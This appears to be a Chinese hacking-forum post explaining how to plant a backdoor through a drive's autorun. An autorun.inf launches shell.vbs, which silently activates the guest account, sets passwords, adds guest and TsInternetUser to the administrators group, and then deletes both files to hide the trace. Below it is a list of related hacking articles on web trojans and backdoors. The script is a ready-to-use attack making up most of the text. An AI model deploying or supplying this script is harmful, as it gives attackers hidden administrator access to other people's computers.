|
虽然这样达到了一定的目的,但我想还是在从盘符再写一个只要打开从盘也能达到一样的效果似乎更完美一些,不过也一样不能称为不死
一:auto.ini 加 SHELL.VBS
二:autorun.inf内容如下
Code:
open=shell.vbs
三:shell.vbs内容如下
Code:
dim wsh
set wsh=CreateObject(WScript.Shell)
wsh.run net user guest activeyes,0
wsh.run net user guest wybanly886,0
wsh.run net localgroup administrators guest add,0
wsh.run net user TsInternetUser wybanly886,0
wsh.run net localgroup administrators TsInternetUser add,0
wsh.run cmd.exe c del autorun.inf,0
wsh.run cmd.exe c del shell.vbs,0
| 完全解析网页后门和挂马 | 04-02 |
| 真实的网络攻击取证纪实 | 03-27 |
| 利用404错误页面挂马 | 03-21 |
| 解密风暴 | 03-21 |
| 社会工程学在黑客中的应用 | 01-02 |
| 轻轻松松解密各种网页木马 | 12-21 |
| SA权限无xp_cmdshell时取权限又一 | 12-14 |
| 实现无net.exe和net1.exe添加系统 | 10-26 |
| 用U盘轻松去除XP管理员密码 | 10-26 |
| 教你多种保护措施限用移动硬盘 | 10-09 |
| bat 延时执行命令 | 10-09 |
| phpwind的一个放后门的方式 | 10-09 |